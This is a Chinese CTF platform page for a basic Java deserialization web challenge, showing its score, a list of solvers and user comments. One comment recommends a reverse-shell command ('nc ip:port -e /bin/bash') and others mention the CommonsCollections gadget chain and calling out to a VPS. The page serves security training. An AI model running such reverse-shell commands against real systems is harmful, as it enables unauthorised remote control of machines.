ez_java_serializeWEB 未解决
分数:
25
金币:
3
题目作者:
0xcccc
一 血:
Paradiso
一血奖励:
5金币
解 决:
140
提 示:
描 述:
基础的java反序列化题目
其 他:
下载
评分(3)
解题动态
tfios 攻破了该题 8天前
mcctf 攻破了该题 9天前
15999935435 攻破了该题 18天前
minshenyao 攻破了该题 18天前
moonquakekeke 攻破了该题 1月前
monksky 攻破了该题 1月前
bbgigl 攻破了该题 1月前
李师傅 攻破了该题 1月前
lidd 攻破了该题 2月前
CTFKnight 攻破了该题 2月前
mingmingsong 攻破了该题 2月前
rookiee 攻破了该题 2月前
派大星CTF 攻破了该题 3月前
testqqq 攻破了该题 3月前
yanlulzs 攻破了该题 3月前
distiny 攻破了该题 4月前
baozongwi 攻破了该题 4月前
coldplay99999 攻破了该题 4月前
2657100414 攻破了该题 4月前
评论
fallingskies 3年前
举报
本地可以,场景里不行,吐了?
Otaku 3年前
举报
...不知道是不是真的连不上外网,反正我在我自己的本地跑不论是ping,curl还是nc都能连上我的vps。但是在这个环境下返回233但是vps毫无反应
amajane 3年前
举报
环境很容易被干死
云牧青 3年前
举报
淦,好坑,bug很多。如果能执行命令了,bash -i反弹是不行的,bash -c中的命令也不能被执行,直接用nc ip:port -e /bin/bash
hotencode 2年前
举报
到了2333这一步请问师傅怎么nc的啊,我根本连不上
Black_hole 3年前
举报
rnm退钱
bazett 3年前
举报
没明白反序列化是啥意思
云牧青 3年前
举报
搞了一下午,从最开始啥也不知道干到ObjectInputStream,干到CommonsCollections,干到成功看到2333的响应。启动了两次环境,结果发现好像不通外网拿不了shell... 你却让我输得这么彻底,哈哈哈哈哈哈哈, 焯 !!!!!!
狐萝卜CarroT 3年前
举报
java反序列化我倒是没了解过,还是先去看看基础吧..
zxmals 3年前
举报
还要花金币下载 。。。。。
lengf 3年前
举报
给一点点提示也行呀(っ °Д °;)っ
lengf 1年前
举报
@0xcccc 好哒
pork 3年前
举报
@0xcccc 靶机好像连不了外网,无法反弹shell,不知道还有没有其他方法?
0xcccc 3年前
举报
不是提供源码了吗,你可先去了解一下java反序列化漏洞